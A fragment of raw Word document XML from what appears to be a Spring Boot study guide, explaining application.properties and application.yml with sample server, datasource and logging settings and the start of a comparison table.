          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    passwor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prodpass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F9489" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00764E9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F8B4F3">
          <v:rect id="_x0000_i2496" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C022BFA" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90" w:rsidP="00764E90">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Features of YAML in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5DF85A" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>indentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (spaces, not tabs!) for hierarchy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420D6911" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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upports </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple documents</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> separated by ---.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178478E3" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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orks seamlessly with Spring's @ConfigurationProperties to map config into POJOs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E496C" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00764E9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428B59">
          <v:rect id="_x0000_i2497" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F210F8" w14:textId="6B0CE4AD" w:rsidR="008156C3" w:rsidRPr="00CE4B95" w:rsidRDefault="008156C3" w:rsidP="008156C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="572" w:name="_Toc196308052"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is application.properties or application.yml used for?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="572"/>
    </w:p>
    <w:p w14:paraId="6595365F" w14:textId="02BFC868" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00E0239D">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oth application.properties and application.yml are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>configuration files</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring Boot. They're used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>define application setting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externalize configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, so you can change behavior without touching Java code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2853BCE5" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A75D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C0AB7C4">
          <v:rect id="_x0000_i2498" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8263A0" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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Main Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3834C113" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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o </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>configure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> things like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADFC879" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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rver port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561AAA3D" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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atabase connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5801CFA8" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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gging levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588856A4" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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curity settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0170C007" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ustom application variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8375FA" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ofiles (dev/test/prod)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1751E2D2" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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rd-party integrations (Kafka, Mail, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B775FEA" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A75D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38CB1F">
          <v:rect id="_x0000_i2499" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA774BD" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589CBD52" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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6713695"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>serv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or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8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1017C789" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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6713695"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sp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atasour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r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jdb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ysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//localhost:3306/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4E96F3" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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6713695"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sp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atasour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user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oot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1101F3B9" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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6713695"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sp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datasour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asswor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ecret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1100CFEC" w14:textId="6D03D482" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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6713695"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>logg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leve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or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pringframewor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FO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5803079B" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A75D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7D533D5">
          <v:rect id="_x0000_i2500" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0747A538" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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ame Example in application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409998FB" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8EB8D6" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  por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8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0155D9EA" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55959643" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B26147" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  datasource</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644ADD66" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    url</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jdb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mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//localhost:3306/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C6E85" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    user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oot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C89D57" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    passwor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secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1348CEDA" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B34362B" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0EF992" w14:textId="77777777" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  level</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7318A6C1" w14:textId="5744C1B1" w:rsidR="00EE68F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    or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pringframewor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INFO </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C661188" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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Difference Between the Tw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71"/>
        <w:gridCol w:w="2090"/>
        <w:gridCol w:w="2564"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w14:paraId="070C79E2" w14:textId="77777777" w:rsidTr="00A75DC8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02BB5EA9" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00473617">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692B1B1C" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00473617">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pplication.properties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35BBF756" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00473617">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pplication.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w14:paraId="0A06FBB4" w14:textId="77777777" w:rsidTr="00A75DC8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04AC8C33" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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mat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8B43BC" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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Key-value pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BB280E0" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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ierarchical &amp; structured</w:t>
            </w:r>
          </w:p>
        </w:tc>
